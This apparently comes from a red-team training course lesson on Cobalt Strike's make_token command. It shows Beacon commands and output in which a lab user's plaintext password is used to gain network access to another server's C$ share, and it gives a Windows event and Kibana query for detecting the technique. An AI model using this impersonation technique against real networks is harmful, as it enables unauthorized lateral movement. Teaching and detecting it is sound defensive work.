The `make_token` command in Cobalt Strike uses the [LogonUserA](https://docs.microsoft.com/en-gb/windows/win32/api/winbase/nf-winbase-logonusera) API which takes the username, domain and plaintext password for a user, as well as a logon type. `make_token` passes the **LOGON32_LOGON_NEW_CREDENTIALS** type, which the MS docs describe as:
>This logon type allows the caller to clone its current token and specify new credentials for outbound connections. The new logon session has the same local identifier but uses different credentials for other network connections.


Let's see this in practice. The Beacon on WKSTN-1 is running as `DEV\bfarmer`, which is reflected by `getuid`.
```shell
beacon> getuid
[*] You are DEV\bfarmer
```

bfarmer is not a local admin on SRV-2.
```shell
beacon> ls \\srv-2\c$
[-] could not open \\srv-2\c$\*: 5
```
>  Remember to use `net helpmsg` to resolve these types of error codes:  
>```shell
>C:\>net helpmsg 5 
>Access is denied.
>```


However, we can find from our domain recon that jking is a local admin on SRV-2. If we have the plaintext password (provided here), we can use `make_token` with that information.
```shell
beacon> make_token DEV\jking Purpl3Drag0n
[+] Impersonated DEV\bfarmer
```

From the API documentation we know that this logon type "allows the caller to clone its current token". This is why the Beacon output says **Impersonated DEV\\bfarmer** - it's impersonating our own cloned token. And if we do a `getuid`, it will also still say we are **DEV\\bfarmer** because the logon type "has the same local identifier". The magic is in "uses different credentials for other network connections" - if we now try to list the **C$** share on SRV-2 we now have access.

```shell
beacon> ls \\srv-2\c$

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     02/10/2021 04:11:30   $Recycle.Bin
          dir     02/10/2021 03:23:44   Boot
          dir     10/18/2016 01:59:39   Documents and Settings
          dir     02/23/2018 11:06:05   PerfLogs
          dir     12/13/2017 21:00:56   Program Files
          dir     02/10/2021 02:01:55   Program Files (x86)
          dir     02/23/2021 17:08:43   ProgramData
          dir     10/18/2016 02:01:27   Recovery
          dir     02/17/2021 18:28:36   System Volume Information
          dir     02/17/2021 18:32:08   Users
          dir     02/17/2021 18:28:54   Windows
 379kb    fil     01/28/2021 07:09:16   bootmgr
 1b       fil     07/16/2016 13:18:08   BOOTNXT
 256mb    fil     03/04/2021 10:12:52   pagefile.sys
```

To dispose of the impersonated token, use `rev2self`.

`make_token` does not require local admin privileges.

 The use of `make_token` generates event `4624: An account was successfully logged on`.  This event is very common in a Windows domain, but can be narrowed down by filtering on the `Logon Type`.  As mentioned above, it uses LOGON32_LOGON_NEW_CREDENTIALS which is type `9`.  Windows commands such as RunAs will also generate the same event.  The event itself records the user who ran the command, the user they're impersonating, and the process it was run from.
 ```shell
 event.code: 4624 and winlog.event_data.LogonType: 9
```

>Use `make_token` to impersonate another user and find the evidence in Kibana.


